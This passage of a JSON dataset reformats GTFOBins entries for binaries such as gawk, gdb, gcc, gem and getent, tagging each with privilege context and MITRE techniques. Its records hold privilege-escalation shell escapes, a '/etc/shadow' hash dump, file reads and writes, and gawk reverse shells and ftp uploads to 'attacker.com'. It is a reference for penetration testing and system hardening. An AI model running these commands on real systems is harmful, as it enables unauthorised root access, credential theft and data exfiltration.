string.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:upload:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:upload:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:fzf:command:0:sudo","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:command:0:suid","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:command:0:unprivileged","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:shell:0:sudo","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:shell:0:suid","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:shell:0:unprivileged","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:gawk:bind-shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:bind-shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:bind-shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-read:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-read:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-read:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-write:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-write:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-write:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:reverse-shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:reverse-shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:reverse-shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/0/attacker.com/12345\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gcc:file-read:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcc -x c -E /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-read:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcc -x c -E /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-read:1:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcc @/path/to/input-file","description":"The file is read and parsed as a list of files (one per line), the content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-read:1:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcc @/path/to/input-file","description":"The file is read and parsed as a list of files (one per line), the content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-write:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gcc -x c /dev/null -o /path/to/input-file","description":"This actually deletes the file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:file-write:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gcc -x c /dev/null -o /path/to/input-file","description":"This actually deletes the file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:shell:0:sudo","toolId":"gtfo:gcc","toolName":"gcc","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gcc -wrapper /bin/sh,-s x","description":"In some older versions, the `x` argument must instead reference any existing file.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcc:shell:0:unprivileged","toolId":"gtfo:gcc","toolName":"gcc","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gcc -wrapper /bin/sh,-s x","description":"In some older versions, the `x` argument must instead reference any existing file.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcc/"]},{"id":"gtfo:gcloud:inherit:0:sudo","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcloud/"]},{"id":"gtfo:gcloud:inherit:0:suid","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gcloud/"]},{"id":"gtfo:gcloud:inherit:0:unprivileged","toolId":"gtfo:gcloud","toolName":"gcloud","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"gcloud help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcloud/"]},{"id":"gtfo:gcore:file-read:0:sudo","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gcore/"]},{"id":"gtfo:gcore:file-read:0:suid","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gcore/"]},{"id":"gtfo:gcore:file-read:0:unprivileged","toolId":"gtfo:gcore","toolName":"gcore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gcore $PID","description":"It can be used to generate core dumps of running processes (`$PID`). Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named `core.$PID`, that is then often filtered with `strings` to narrow down relevant information.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gcore/"]},{"id":"gtfo:gdb:file-write:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:file-write:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:file-write:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gdb -nx -ex 'dump value /path/to/output-file \"DATA\"' -ex quit","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:inherit:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:inherit:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:inherit:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"gdb -nx -ex 'python ...' -ex quit","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:shell:0:capabilities","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex 'python import os; os.setuid(0)' -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:shell:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:shell:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gdb:shell:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"]},{"id":"gtfo:gem:inherit:0:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"gem open debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:0:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"gem open debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:1:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"gem build /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:1:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"gem build /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:2:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"gem install --file /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:inherit:2:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"gem install --file /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:shell:0:sudo","toolId":"gtfo:gem","toolName":"gem","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gem open -e '/bin/sh -s' debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:gem:shell:0:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gem open -e '/bin/sh -s' debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"]},{"id":"gtfo:genie:shell:0:sudo","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genie/"]},{"id":"gtfo:genie:shell:0:suid","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genie/"]},{"id":"gtfo:genie:shell:0:unprivileged","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genie/"]},{"id":"gtfo:genisoimage:file-read:0:sudo","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:0:suid","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:0:unprivileged","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:1:sudo","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:1:suid","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:genisoimage:file-read:1:unprivileged","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genisoimage/"]},{"id":"gtfo:getent:privilege-escalation:0:sudo","toolId":"gtfo:getent","toolName":"getent","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"getent shadow","description":"This allows to dump password hashes from the `/etc/shadow` file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/getent/"]},{"id":"gtfo:getent:privilege-escalation:0:suid","toolId":"gtfo:getent","toolName":"getent","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"getent shadow","description":"This allows to dump password hashes from the `/etc/shadow` file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/getent/"]},{"id":"gtfo:ghc:shell:0:sudo","toolId":"gtfo:ghc","toolName":"ghc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ghc -e 'System.Process.callCommand \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ghc/"]},{"id":"gtfo:ghc:shell:0:unprivileged","toolId":"gtfo:ghc","toolName":"ghc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ghc -e 'System.Process.callCommand 